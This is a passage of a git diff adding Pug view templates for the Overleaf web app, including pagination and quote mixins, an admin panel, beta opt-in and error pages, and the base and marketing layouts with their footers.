span … + + li + a( + aria-label=translate("go_to_next_page") + href=full_page_path + (parseInt(pages.current_page, 10) + 1) + rel="next" + ) + | Next + | + span(aria-hidden="true") > + + li + a( + aria-label=translate("go_to_last_page") + href=full_page_path + pages.total_pages + ) + | Last + | + span(aria-hidden="true") >> diff --git a/services/web/app/views/_mixins/previous_page_link.pug b/services/web/app/views/_mixins/previous_page_link.pug new file mode 100644 index 0000000..5218c6a --- /dev/null +++ b/services/web/app/views/_mixins/previous_page_link.pug @@ -0,0 +1,4 @@ +mixin previous-page-link(href, text) + a.previous-page-link(href=href) + i.material-symbols.material-symbols-rounded(aria-hidden="true") arrow_left_alt + | #{text} diff --git a/services/web/app/views/_mixins/quote.pug b/services/web/app/views/_mixins/quote.pug new file mode 100644 index 0000000..b8065db --- /dev/null +++ b/services/web/app/views/_mixins/quote.pug @@ -0,0 +1,54 @@ +mixin quoteLargeTextCentered(quote, person, position, affiliation, link, pictureUrl, pictureAltAttr) + blockquote.quote-large-text-centered + .quote !{quote} + if pictureUrl + .quote-img + img(src=pictureUrl alt=pictureAltAttr) + footer + div.quote-person + strong #{person} + if person && position + div #{position} + if affiliation + div #{affiliation} + if link + .quote-link !{link} + +mixin quoteLeftGreenBorder({quote, person, position, affiliation, link}) + blockquote.quote-left-green-border + .quote !{quote} + footer + | #{person} + | #{position || affiliation ? ',' : ''} + | #{position} + | #{position && affiliation ? ' at ' : ''} + | #{affiliation} + if link + .quote-link !{link} + +mixin collinsQuote1 + .card.card-dark-green-bg + -var quote = 'Overleaf is indispensable for us. We use it in our research, thesis writing, project proposals, and manuscripts for publication. When it comes to writing, it’s our main tool.' + -var quotePerson = 'Christopher Collins' + -var quotePersonPosition = 'Associate Professor and Lab Director, Ontario Tech University' + -var quotePersonImg = buildImgPath("advocates/collins.jpg") + .card-body + +quoteLargeTextCentered(quote, quotePerson, quotePersonPosition, null, null, quotePersonImg, quotePerson) + +mixin collinsQuote2 + .card.card-dark-green-bg + -var quote = 'We are writing collaboratively right up until the last minute. We are faced with deadlines all the time, and Overleaf gives us the ability to polish right up until the last possible second.' + -var quotePerson = 'Christopher Collins' + -var quotePersonPosition = 'Associate Professor and Lab Director, Ontario Tech University' + -var quotePersonImg = buildImgPath("advocates/collins.jpg") + .card-body + +quoteLargeTextCentered(quote, quotePerson, quotePersonPosition, null, null, quotePersonImg, quotePerson) + +mixin bennettQuote1 + .card.card-dark-green-bg + -var quote = 'With Overleaf, we now have a process for developing technical documentation which has virtually eliminated the time required to properly format and layout documents.' + -var quotePerson = 'Andrew Bennett' + -var quotePersonPosition = 'Software Architect, Symplectic' + -var quotePersonImg = buildImgPath("advocates/bennett.jpg") + .card-body + +quoteLargeTextCentered(quote, quotePerson, quotePersonPosition, null, null, quotePersonImg, quotePerson) \ No newline at end of file diff --git a/services/web/app/views/_mixins/recaptcha.pug b/services/web/app/views/_mixins/recaptcha.pug new file mode 100644 index 0000000..24e0c50 --- /dev/null +++ b/services/web/app/views/_mixins/recaptcha.pug @@ -0,0 +1,2 @@ +mixin recaptchaConditions() + .recaptcha-branding !{translate("recaptcha_conditions", {}, [{}, {name: 'a', attrs: {href: 'https://policies.google.com/privacy', rel: 'noopener noreferrer', target: '_blank'}}, {name: 'a', attrs: {href: 'https://policies.google.com/terms', rel: 'noopener noreferrer', target: '_blank'}}])} diff --git a/services/web/app/views/_mixins/reconfirm_affiliation-marketing.pug b/services/web/app/views/_mixins/reconfirm_affiliation-marketing.pug new file mode 100644 index 0000000..c42a3b4 --- /dev/null +++ b/services/web/app/views/_mixins/reconfirm_affiliation-marketing.pug @@ -0,0 +1,61 @@ +mixin reconfirmAffiliationNotification-marketing(userEmail, location) + form( + data-ol-async-form + action='/user/emails/send-reconfirmation' + ) + input(name="_csrf" type="hidden" value=csrfToken) + input(name="email" type="hidden" value=userEmail.email) + +formMessages() + + .reconfirm-notification + div(data-ol-not-sent style="width:100%;") + i.fa.fa-warning + + - var ssoEnabled = userEmail.affiliation && userEmail.affiliation.institution && userEmail.affiliation.institution.ssoEnabled + if ssoEnabled + - var institutionId = userEmail.affiliation && userEmail.affiliation.institution && userEmail.affiliation.institution.id + a.btn-reconfirm.btn.btn-sm.btn-info( + data-ol-slow-link + href=`${settings.saml.ukamf.initPath}?university_id=${institutionId}&reconfirm=${location}` + ) + span(data-ol-inflight="idle") #{translate("confirm_affiliation")} + span(hidden data-ol-inflight="pending") #{translate("pending")}… + + else + button.btn-reconfirm.btn.btn-sm.btn-info( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("confirm_affiliation")} + span(hidden data-ol-inflight="pending") #{translate("pending")}… + + | !{translate("are_you_still_at", {institutionName: userEmail.affiliation.institution.name}, ['strong'])}  + + if location == '/user/settings' + | !{translate('please_reconfirm_institutional_email', {}, [{ name: 'span' }])} + if userEmail.default + span  #{translate('need_to_add_new_primary_before_remove')} + else + | !{translate("please_reconfirm_institutional_email", {}, [{name: 'a', attrs: {href: '/user/settings?remove=' + userEmail.email}}])} + + |   + a(href="/learn/how-to/Institutional_Email_Reconfirmation" target="_blank") #{translate("learn_more")} + + div(hidden data-ol-sent) + | !{translate("please_check_your_inbox_to_confirm", {institutionName: userEmail.affiliation.institution.name}, ['strong'])} + |   + button.btn-inline-link( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate('resend_confirmation_email')} + span(hidden data-ol-inflight="pending") #{translate("pending")}… + +mixin reconfirmedAffiliationNotification-marketing(userEmail) + .alert.alert-info + .reconfirm-notification + div(style="width:100%;") + //- extra div for flex styling + | !{translate("your_affiliation_is_confirmed", {institutionName: userEmail.affiliation.institution.name}, ['strong'])} + | + | #{translate('thank_you_exclamation')} diff --git a/services/web/app/views/_mixins/terms_of_service.pug b/services/web/app/views/_mixins/terms_of_service.pug new file mode 100644 index 0000000..0fc3887 --- /dev/null +++ b/services/web/app/views/_mixins/terms_of_service.pug @@ -0,0 +1,3 @@ +mixin termsOfServiceAgreement + div.tos-agreement-notice + | !{translate("by_registering_you_agree_to_our_terms_of_service", {}, [{name: 'a', attrs: {href: '/legal#Terms', target: '_blank'}}, {name: 'a', attrs: {href: '/legal#Privacy', target: '_blank'}}])} diff --git a/services/web/app/views/admin/index.pug b/services/web/app/views/admin/index.pug new file mode 100644 index 0000000..aaf2228 --- /dev/null +++ b/services/web/app/views/admin/index.pug @@ -0,0 +1,102 @@ +extends ../layout-marketing +include ../_mixins/bookmarkable_tabset + +block content + .content.content-alt#main-content + .container + .row + .col-sm-12 + .card + .card-body + .page-header + h1 Admin Panel + .ol-tabs(data-ol-bookmarkable-tabset) + .nav-tabs-container + ul.nav.nav-tabs.align-left(role="tablist") + +bookmarkable-tabset-header('system-messages', 'System Messages', true) + +bookmarkable-tabset-header('open-sockets', 'Open Sockets') + +bookmarkable-tabset-header('open-close-editor', 'Open/Close Editor') + if hasFeature('saas') + +bookmarkable-tabset-header('tpds', 'TPDS/Dropbox Management') + + .tab-content + .tab-pane.active( + role="tabpanel" + id='system-messages' + ) + each message in systemMessages + ul.system-messages + li.system-message.row-spaced #{message.content} + hr + form(method='post', action='/admin/messages') + input(name="_csrf", type="hidden", value=csrfToken) + .form-group + label.form-label(for="content") + input.form-control(name="content", type="text", placeholder="Message…", required) + button.btn.btn-primary(type="submit") Post Message + hr + form(method='post', action='/admin/messages/clear') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Clear all messages + + .tab-pane( + role="tabpanel" + id='open-sockets' + ) + .row-spaced + ul + each agents, url in openSockets + li #{url} - total : #{agents.length} + ul + each agent in agents + li #{agent} + + .tab-pane( + role="tabpanel" + id='open-close-editor' + ) + if hasFeature('saas') + | The "Open/Close Editor" feature is not available in SAAS. + else + .row-spaced + form(method='post',action='/admin/closeEditor') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Close Editor + p.small Will stop anyone opening the editor. Will NOT disconnect already connected users. + + .row-spaced + form(method='post',action='/admin/disconnectAllUsers') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Disconnect all users + p.small Will force disconnect all users with the editor open. Make sure to close the editor first to avoid them reconnecting. + + .row-spaced + form(method='post',action='/admin/openEditor') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Reopen Editor + p.small Will reopen the editor after closing. + + if hasFeature('saas') + .tab-pane( + role="tabpanel" + id='tpds' + ) + h3 Flush project to TPDS + .row + form.col-xs-6(method='post',action='/admin/flushProjectToTpds') + input(name="_csrf", type="hidden", value=csrfToken) + .form-group + label.form-label(for='project_id') project_id + input.form-control(type='text', name='project_id', placeholder='project_id', required) + .form-group + button.btn-primary.btn(type='submit') Flush + hr + h3 Poll Dropbox for user + .row + form.col-xs-6(method='post',action='/admin/pollDropboxForUser') + input(name="_csrf", type="hidden", value=csrfToken) + .form-group + label.form-label(for='user_id') user_id + input.form-control(type='text', name='user_id', placeholder='user_id', required) + .form-group + button.btn-primary.btn(type='submit') Poll diff --git a/services/web/app/views/beta_program/opt_in.pug b/services/web/app/views/beta_program/opt_in.pug new file mode 100644 index 0000000..2bbc26c --- /dev/null +++ b/services/web/app/views/beta_program/opt_in.pug @@ -0,0 +1,75 @@ +extends ../layout-marketing +include ../_mixins/back_to_btns + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container.beta-opt-in-wrapper + .row + .col-md-10.col-md-offset-1.col-lg-8.col-lg-offset-2 + .card + .page-header + h1 + | #{translate("sharelatex_beta_program")} + .beta-opt-in + .container-fluid + .row + .col-md-12 + if user.betaProgram + p.text-centered + strong #{translate("beta_program_already_participating")}. + p !{translate("thank_you_for_being_part_of_our_beta_program", {}, ['strong'])}. + else + p.text-centered + strong #{translate("beta_program_not_participating")}. + p !{translate("beta_program_benefits", {}, ['strong'])} + + p #[strong How it works:] + ul + li #{translate("beta_program_badge_description")} #[span(aria-label=translate("beta_feature_badge") role="img").beta-badge] + li !{translate("you_will_be_able_to_contact_us_any_time_to_share_your_feedback", {}, ['strong'])}. + li !{translate("we_may_also_contact_you_from_time_to_time_by_email_with_a_survey", {}, ['strong'])}. + li !{translate("you_can_opt_in_and_out_of_the_program_at_any_time_on_this_page", {}, ['strong'])}. + p !{translate("note_features_under_development", {}, ['strong'])}. + + .row.text-centered + .col-md-12 + if user.betaProgram + form( + data-ol-regular-form + method="post" + action="/beta/opt-out" + novalidate + ) + input(type="hidden", name="_csrf", value=csrfToken) + .form-group + a( + href="https://forms.gle/CFEsmvZQTAwHCd3X9" + target="_blank" + rel="noopener noreferrer" + ).btn.btn-primary.btn-lg #{translate("give_feedback")} + .form-group + button.btn.btn-secondary-info.btn-secondary.btn-sm( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("beta_program_opt_out_action")} + span(hidden data-ol-inflight="pending") #{translate("processing")}… + else + form( + data-ol-regular-form + method="post", + action="/beta/opt-in" + ) + input(type="hidden", name="_csrf", value=csrfToken) + .form-group + button.btn.btn-primary( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("beta_program_opt_in_action")} + span(hidden data-ol-inflight="pending") #{translate("joining")}… + .page-separator + +back-to-btns() diff --git a/services/web/app/views/general/400.pug b/services/web/app/views/general/400.pug new file mode 100644 index 0000000..9fc9782 --- /dev/null +++ b/services/web/app/views/general/400.pug @@ -0,0 +1,31 @@ +extends ../layout/layout-no-js + +block vars + - metadata = { title: 'Something went wrong' } + - bootstrap5PageStatus = 'disabled' + +block body + body.full-height + main.content.content-alt.full-height#main-content + .container.full-height + .error-container.full-height + .error-details + p.error-status Something went wrong, sorry. + p.error-description + | There was a problem with your request. + if(message) + | + | The error is: + if(message) + p.error-box + | #{message} + p.error-description + | Please go back and try again. + | If the problem persists, please contact us at + | + a(href="mailto:" + settings.adminEmail) #{settings.adminEmail} + | . + p.error-actions + a.error-btn(href="javascript:history.back()") Back + |   + a.btn.btn-secondary(href="/") Home diff --git a/services/web/app/views/general/404.pug b/services/web/app/views/general/404.pug new file mode 100644 index 0000000..f4b5800 --- /dev/null +++ b/services/web/app/views/general/404.pug @@ -0,0 +1,14 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .error-container + .error-details + p.error-status Not found + p.error-description #{translate("cant_find_page")} + p.error-actions + a.error-btn(href="/") Home diff --git a/services/web/app/views/general/500.pug b/services/web/app/views/general/500.pug new file mode 100644 index 0000000..90cb1e3 --- /dev/null +++ b/services/web/app/views/general/500.pug @@ -0,0 +1,24 @@ +extends ../layout/layout-no-js + +block vars + - metadata = { title: 'Something went wrong' } + - bootstrap5PageStatus = 'disabled' + +block body + body.full-height + main.content.content-alt.full-height#main-content + .container.full-height + .error-container.full-height + .error-details + p.error-status Something went wrong, sorry. + p.error-description Our staff are probably looking into this, but if it continues, please check our status page at + | + | + a(href="http://" + settings.statusPageUrl) #{settings.statusPageUrl} + | + | or contact us at + | + a(href="mailto:" + settings.adminEmail) #{settings.adminEmail} + | . + p.error-actions + a.error-btn(href="/") Home diff --git a/services/web/app/views/general/closed.pug b/services/web/app/views/general/closed.pug new file mode 100644 index 0000000..f401299 --- /dev/null +++ b/services/web/app/views/general/closed.pug @@ -0,0 +1,22 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content#main-content + .container + .row + .col-md-8.col-md-offset-2.text-center + .page-header + h1 Maintenance + p + if settings.statusPageUrl + | #{settings.appName} is currently down for maintenance. + | Please check our #[a(href='https://' + settings.statusPageUrl) status page] + | for updates. + else + | #{settings.appName} is currently down for maintenance. + | We should be back within minutes, but if not, or you have + | an urgent request, please contact us at + |  #{settings.adminEmail} diff --git a/services/web/app/views/general/post-gateway.pug b/services/web/app/views/general/post-gateway.pug new file mode 100644 index 0000000..dcc8441 --- /dev/null +++ b/services/web/app/views/general/post-gateway.pug @@ -0,0 +1,26 @@ +extends ../layout-marketing + +block vars + - var suppressNavbar = true + - var suppressFooter = true + - var suppressSkipToContent = true + - var suppressCookieBanner = true + - bootstrap5PageStatus = 'disabled' + +block content + .content.content-alt + .container + .row + .col-md-6.col-md-offset-3 + .card + p.text-center #{translate('processing_your_request')} + + form( + data-ol-regular-form + data-ol-auto-submit + method="POST" + ) + input(name="_csrf" type="hidden" value=csrfToken) + input(hidden name="viaGateway" type="submit" value="true") + for name in Object.keys(form_data) + input(name=name type="hidden" value=form_data[name]) diff --git a/services/web/app/views/general/unsupported-browser.pug b/services/web/app/views/general/unsupported-browser.pug new file mode 100644 index 0000000..f8806cf --- /dev/null +++ b/services/web/app/views/general/unsupported-browser.pug @@ -0,0 +1,46 @@ +extends ../layout/layout-no-js + +block vars + - metadata = { title: 'Unsupported browser' } + - bootstrap5PageStatus = 'disabled' + +block body + body.full-height + main.content.content-alt.full-height#main-content + .container.full-height + .error-container.full-height + .error-details + h1.error-status Unsupported Browser + p.error-description + | Sorry, we don't support your browser anymore. Please see below what browsers we support. + br + | If you think you're seeing this message in error, + | + a(href="mailto:" + settings.adminEmail) please let us know + | . + + if fromURL + p + | URL: + | + a(href=fromURL) #{fromURL} + + hr + + p + | Overleaf officially supports versions of Chrome, Firefox, Safari and Microsoft Edge released in the last 12 months. + br + | Firefox ESR is also supported for 12 months. + p + | Support for beta or developer-preview browser versions cannot be guaranteed. Please + | + a(href="mailto:" + settings.adminEmail) get in touch + | + | if you encounter any issues while using the service with beta or developer-preview releases of supported browsers. + p + strong Overleaf has stopped supporting Internet Explorer as of April 26, 2021, and access is now blocked. + p + | If you cannot upgrade to one of the supported browsers, + | + a(href="mailto:" + settings.adminEmail) please let us know + | . diff --git a/services/web/app/views/layout-base.pug b/services/web/app/views/layout-base.pug new file mode 100644 index 0000000..0493281 --- /dev/null +++ b/services/web/app/views/layout-base.pug @@ -0,0 +1,112 @@ +include ./_mixins/foot_scripts + +doctype html +html( + lang=(currentLngCode || 'en') + class=(fixedSizeDocument ? 'fixed-size-document' : undefined) +) + - metadata = metadata || {} + - let bootstrap5PageStatus = 'enabled' // One of 'disabled' and 'enabled' + - let bootstrap5PageSplitTest = '' // Limits Bootstrap 5 usage on this page to users with an assignment of "enabled" for the specified split test. If left empty and bootstrap5PageStatus is "enabled", the page always uses Bootstrap 5. + - let isWebsiteRedesign = false + - let isApplicationPage = false + - let enableIeeeBranding = true + + block entrypointVar + + block isApplicationPageVar + + block vars + + head + include ./_metadata.pug + + - const bootstrapVersion = bootstrap5PageStatus !== 'disabled' && (bootstrap5Override || bootstrap5PageSplitTest === '' || splitTestVariants[bootstrap5PageSplitTest] === 'enabled') ? 5 : 3 + + //- Stylesheet + link(rel='stylesheet', href=buildCssPath(getCssThemeModifier(userSettings, brandVariation, enableIeeeBranding), bootstrapVersion), id="main-stylesheet") + block css + each file in entrypointStyles(entrypoint) + link(rel='stylesheet', href=file) + + block _headLinks + + if (typeof suppressRelAlternateLinks == "undefined") + if settings.i18n.subdomainLang + each subdomainDetails in settings.i18n.subdomainLang + if !subdomainDetails.hide + link(rel="alternate", href=subdomainDetails.url + currentUrl, hreflang=subdomainDetails.lngCode) + + if (entrypoint !== 'marketing') + link(rel="preload", href=buildJsPath(currentLngCode + "-json.js"), as="script", nonce=scriptNonce) + + //- Scripts + if (typeof suppressGoogleAnalytics == "undefined") + include _google_analytics + + block meta + meta(name="ol-csrfToken" content=csrfToken) + //- Configure dynamically loaded assets (via webpack) to be downloaded from CDN + //- See: https://webpack.js.org/guides/public-path/#on-the-fly + meta(name="ol-baseAssetPath" content=buildBaseAssetPath()) + meta(name="ol-mathJaxPath" content=mathJaxPath) + meta(name="ol-dictionariesRoot" content=dictionariesRoot) + + meta(name="ol-usersEmail" content=getUserEmail()) + meta(name="ol-ab" data-type="json" content={}) + meta(name="ol-user_id" content=getLoggedInUserId()) + //- Internationalisation settings + meta(name="ol-i18n" data-type="json" content={ + currentLangCode: currentLngCode + }) + //- Expose some settings globally to the frontend + meta(name="ol-ExposedSettings" data-type="json" content=ExposedSettings) + meta(name="ol-splitTestVariants" data-type="json" content=splitTestVariants || {}) + meta(name="ol-splitTestInfo" data-type="json" content=splitTestInfo || {}) + + if (typeof settings.algolia != "undefined") + meta(name="ol-algolia" data-type="json" content={ + appId: settings.algolia.app_id, + apiKey: settings.algolia.read_only_api_key, + indexes: settings.algolia.indexes + }) + + meta(name="ol-isManagedAccount" data-type="boolean" content=isManagedAccount) + each restriction in userRestrictions || [] + meta(name='ol-cannot-' + restriction data-type="boolean" content=true) + meta(name="ol-bootstrapVersion" data-type="json" content=bootstrapVersion) + + block head-scripts + + body(class={ + 'thin-footer': showThinFooter, + 'website-redesign': isWebsiteRedesign === true || websiteRedesignOverride, + 'application-page': isApplicationPage + }, data-theme="default") + if(settings.recaptcha && settings.recaptcha.siteKeyV3) + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=" + settings.recaptcha.siteKeyV3, defer=deferScripts) + + if (typeof suppressSkipToContent == "undefined") + a(class="skip-to-content" href="#main-content") #{translate('skip_to_content')} + + block body + + if (settings.devToolbar.enabled) + div#dev-toolbar + + block foot-scripts + +foot-scripts + + include _customer_io + + script(type="text/javascript", nonce=scriptNonce). + window.addEventListener('DOMContentLoaded', function() { + //- Look for bundle + var cdnBlocked = typeof Frontend === 'undefined' + //- Prevent loops + var noCdnAlreadyInUrl = window.location.href.indexOf("nocdn=true") != -1 + if (cdnBlocked && !noCdnAlreadyInUrl && navigator.userAgent.indexOf("Googlebot") == -1) { + //- Set query param, server will not set CDN url + window.location.search += "&nocdn=true"; + } + }) diff --git a/services/web/app/views/layout-marketing.pug b/services/web/app/views/layout-marketing.pug new file mode 100644 index 0000000..20126be --- /dev/null +++ b/services/web/app/views/layout-marketing.pug @@ -0,0 +1,36 @@ +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + +block body + if (typeof suppressNavbar === "undefined") + if bootstrapVersion === 5 + include layout/navbar-marketing-bootstrap-5 + else + include layout/navbar-marketing + + block content + + if (typeof suppressFooter === "undefined") + if showThinFooter + if bootstrapVersion === 5 + include layout/thin-footer-bootstrap-5 + else + include layout/thin-footer + else + include layout/fat-footer + + if (typeof(suppressCookieBanner) == 'undefined') + include _cookie_banner + + if bootstrapVersion === 5 + != moduleIncludes("contactModal-marketing-bootstrap-5", locals) + else + != moduleIncludes("contactModal-marketing", locals) + +block prepend foot-scripts + +bootstrap-js(bootstrapVersion) diff --git a/services/web/app/views/layout-react.pug b/services/web/app/views/layout-react.pug new file mode 100644 index 0000000..f3dc8e6 --- /dev/null +++ b/services/web/app/views/layout-react.pug @@ -0,0 +1,83 @@ +//- This is used for pages that are migrated to Bootstrap 5 but don't use Bootstrap's own JS, instead using +//- react-bootstrap for all Bootstrap components +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + +block isApplicationPageVar + - isApplicationPage = true + +block append meta + if bootstrapVersion === 5 + - const canDisplayAdminMenu = hasAdminAccess() + - const canDisplayAdminRedirect = canRedirectToAdminDomain() + - const sessionUser = getSessionUser() + - const staffAccess = sessionUser?.staffAccess + - const canDisplaySplitTestMenu = hasFeature('saas') && (canDisplayAdminMenu || staffAccess?.splitTestMetrics || staffAccess?.splitTestManagement) + - const canDisplaySurveyMenu = hasFeature('saas') && canDisplayAdminMenu + - const canDisplayScriptLogMenu = hasFeature('saas') && canDisplayAdminMenu + - const enableUpgradeButton = projectDashboardReact && usersBestSubscription && (usersBestSubscription.type === 'free' || usersBestSubscription.type === 'standalone-ai-add-on') + - const showSignUpLink = hasFeature('registration-page') + + meta(name="ol-navbar" data-type="json" content={ + customLogo: settings.nav.custom_logo, + title: nav.title, + canDisplayAdminMenu, + canDisplayAdminRedirect, + canDisplaySplitTestMenu, + canDisplaySurveyMenu, + canDisplayScriptLogMenu, + enableUpgradeButton, + suppressNavbarRight: !!suppressNavbarRight, + suppressNavContentLinks: !!suppressNavContentLinks, + showSubscriptionLink: nav.showSubscriptionLink, + showSignUpLink: showSignUpLink, + currentUrl: currentUrl, + sessionUser: sessionUser ? { email: sessionUser.email} : undefined, + adminUrl: settings.adminUrl, + items: cloneAndTranslateText(nav.header_extras) + }) + meta(name="ol-footer" data-type="json" content={ + showThinFooter: showThinFooter, + showPoweredBy: !hasFeature('saas') && !settings.nav.hide_powered_by, + subdomainLang: settings.i18n.subdomainLang, + translatedLanguages: settings.translatedLanguages, + leftItems: cloneAndTranslateText(settings.nav.left_footer), + rightItems: settings.nav.right_footer + }) + +block body + if (typeof suppressNavbar === "undefined") + if bootstrapVersion === 5 + include layout/navbar-marketing-react-bootstrap-5 + else + include layout/navbar-marketing + + block content + + if (typeof suppressFooter === "undefined") + if showThinFooter + if bootstrapVersion === 5 + include layout/thin-footer-bootstrap-5 + else + include layout/thin-footer + else + if bootstrapVersion === 5 + include layout/fat-footer-react-bootstrap-5 + else + include layout/fat-footer + + if (typeof suppressCookieBanner === "undefined") + include _cookie_banner + + if bootstrapVersion === 3 + != moduleIncludes("contactModal-marketing", locals) + +block prepend foot-scripts + //- Only include Bootstrap JS if using Bootstrap 3 + if bootstrapVersion === 3 + +bootstrap-js(3) diff --git a/services/web/app/views/layout-website-redesign-bootstrap-5.pug b/services/web/app/views/layout-website-redesign-bootstrap-5.pug new file mode 100644 index 0000000..e6dc3a8 --- /dev/null +++ b/services/web/app/views/layout-website-redesign-bootstrap-5.pug @@ -0,0 +1,28 @@ +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + - isWebsiteRedesign = true + +block body + if (typeof(suppressNavbar) == "undefined") + include layout/navbar-marketing-bootstrap-5 + + block content + + if (typeof(suppressFooter) == "undefined") + if showThinFooter + include layout/thin-footer-bootstrap-5 + else + include layout/fat-footer-website-redesign + + if (typeof(suppressCookieBanner) == 'undefined') + include _cookie_banner + + != moduleIncludes("contactModal-marketing-bootstrap-5", locals) + +block prepend foot-scripts + +bootstrap-js(5) diff --git a/services/web/app/views/layout-website-redesign.pug b/services/web/app/views/layout-website-redesign.pug new file mode 100644 index 0000000..37ba2f9 --- /dev/null +++ b/services/web/app/views/layout-website-redesign.pug @@ -0,0 +1,27 @@ +extends ./layout-base + +include ./_mixins/formMessages +include ./_mixins/bootstrap_js + +block entrypointVar + - entrypoint = 'marketing' + +block body + if (typeof(suppressNavbar) == "undefined") + include layout/navbar-website-redesign + + block content + + if (typeof(suppressFooter) == "undefined") + if showThinFooter + include layout/thin-footer + else + include layout/fat-footer-website-redesign + + if (typeof(suppressCookieBanner) == 'undefined') + include _cookie_banner + + != moduleIncludes("contactModal-marketing", locals) + +block prepend foot-scripts + +bootstrap-js(bootstrapVersion) diff --git a/services/web/app/views/layout/fat-footer-base.pug b/services/web/app/views/layout/fat-footer-base.pug new file mode 100644 index 0000000..2e3dd20 --- /dev/null +++ b/services/web/app/views/layout/fat-footer-base.pug @@ -0,0 +1,32 @@ +.fat-footer-base + .fat-footer-base-section.fat-footer-base-meta + .fat-footer-base-item + .fat-footer-base-copyright © #{new Date().getFullYear()} Overleaf + a(href="/legal") #{translate('privacy_and_terms')} + a(href="https://www.digital-science.com/security-certifications/") #{translate('compliance')} + ul.fat-footer-base-item.list-unstyled.fat-footer-base-language + if bootstrapVersion === 5 + include language-picker-bootstrap-5 + else + include language-picker + .fat-footer-base-section.fat-footer-base-social + .fat-footer-base-item + a.fat-footer-social.x-logo(href="https://x.com/overleaf") + svg(xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 1227" height="25") + path(d="M714.163 519.284L1160.89 0H1055.03L667.137 450.887L357.328 0H0L468.492 681.821L0 1226.37H105.866L515.491 750.218L842.672 1226.37H1200L714.137 519.284H714.163ZM569.165 687.828L521.697 619.934L144.011 79.6944H306.615L611.412 515.685L658.88 583.579L1055.08 1150.3H892.476L569.165 687.854V687.828Z") + span.visually-hidden #{translate("app_on_x", {social: "X"})} + a.fat-footer-social.facebook-logo(href="https://www.facebook.com/overleaf.editor") + svg(xmlns="http://www.w3.org/2000/svg" viewBox="0 0 666.66668 666.66717" height="25") + defs + clipPath(id="a" clipPathUnits="userSpaceOnUse") + path(d="M0 700h700V0H0Z") + g(clip-path="url(#a)" transform="matrix(1.33333 0 0 -1.33333 -133.333 800)") + path.background(d="M0 0c0 138.071-111.929 250-250 250S-500 138.071-500 0c0-117.245 80.715-215.622 189.606-242.638v166.242h-51.552V0h51.552v32.919c0 85.092 38.508 124.532 122.048 124.532 15.838 0 43.167-3.105 54.347-6.211V81.986c-5.901.621-16.149.932-28.882.932-40.993 0-56.832-15.528-56.832-55.9V0h81.659l-14.028-76.396h-67.631v-171.773C-95.927-233.218 0-127.818 0 0" fill="#0866ff" transform="translate(600 350)") + path.text(d="m0 0 14.029 76.396H-67.63v27.019c0 40.372 15.838 55.899 56.831 55.899 12.733 0 22.981-.31 28.882-.931v69.253c-11.18 3.106-38.509 6.212-54.347 6.212-83.539 0-122.048-39.441-122.048-124.533V76.396h-51.552V0h51.552v-166.242a250.559 250.559 0 0 1 60.394-7.362c10.254 0 20.358.632 30.288 1.831V0Z" fill="#fff" transform="translate(447.918 273.604)") + span.visually-hidden #{translate("app_on_x", {social: "Facebook"})} + a.fat-footer-social.linkedin-logo(href="https://www.linkedin.com/company/writelatex-limited") + svg(xmlns="http://www.w3.org/2000/svg" viewBox="0 0 72 72" height="25") + g(fill="none" fill-rule="evenodd") + path.background(fill="#0B66C3" d="M8 72h56a8 8 0 0 0 8-8V8a8 8 0 0 0-8-8H8a8 8 0 0 0-8 8v56a8 8 0 0 0 8 8") + path.text(fill="#FFF" d="M62 62H51.316V43.802c0-4.99-1.896-7.777-5.845-7.777-4.296 0-6.54 2.901-6.54 7.777V62H28.632V27.333H38.93v4.67s3.096-5.729 10.453-5.729c7.353 0 12.617 4.49 12.617 13.777zM16.35 22.794c-3.508 0-6.35-2.864-6.35-6.397C10 12.864 12.842 10 16.35 10c3.507 0 6.347 2.864 6.347 6.397 0 3.533-2.84 6.397-6.348 6.397ZM11.032 62h10.736V27.333H11.033V62") + span.visually-hidden #{translate("app_on_x", {social: "LinkedIn"})} diff --git a/services/web/app/views/layout/fat-footer-react-bootstrap-5.pug b/services/web/app/views/layout/fat-footer-react-bootstrap-5.pug new file mode 100644 index 0000000..95b2605 --- /dev/null +++ b/services/web/app/views/layout/fat-footer-react-bootstrap-5.pug @@ -0,0 +1 @@ +#footer-container diff --git a/services/web/app/views/layout/fat-footer-website-redesign.pug b/services/web/app/views/layout/fat-footer-website-redesign.pug new file mode 100644 index 0000000..bde9113 --- /dev/null +++ b/services/web/app/views/layout/fat-footer-website-redesign.pug @@ -0,0 +1,84 @@ +footer.fat-footer.hidden-print.website-redesign-fat-footer + .fat-footer-container(role="navigation" aria-label=translate('footer_navigation')) + .fat-footer-sections(class=hideFatFooter ? 'hidden' : undefined) + .footer-section#footer-brand + a(href='/', aria-label=settings.appName).footer-brand + + .footer-section + h2.footer-section-heading #{translate('About')} + + ul.list-unstyled + li + a(href="/about") #{translate('footer_about_us')} + li + a(href="/about/values") #{translate('our_values')} + li + a(href="/about/careers") #{translate('careers')} + li + a(href="/for/press") !{translate('press_and_awards')} + li + a(href="/blog") #{translate('blog')} + + .footer-section + h2.footer-section-heading #{translate('learn')} + + ul.list-unstyled + li + a(href="/learn/latex/Learn_LaTeX_in_30_minutes") #{translate('latex_in_thirty_minutes')} + li + a(href="/latex/templates") #{translate('templates')} + li + a(href="/events/webinars") #{translate('webinars')} + li + 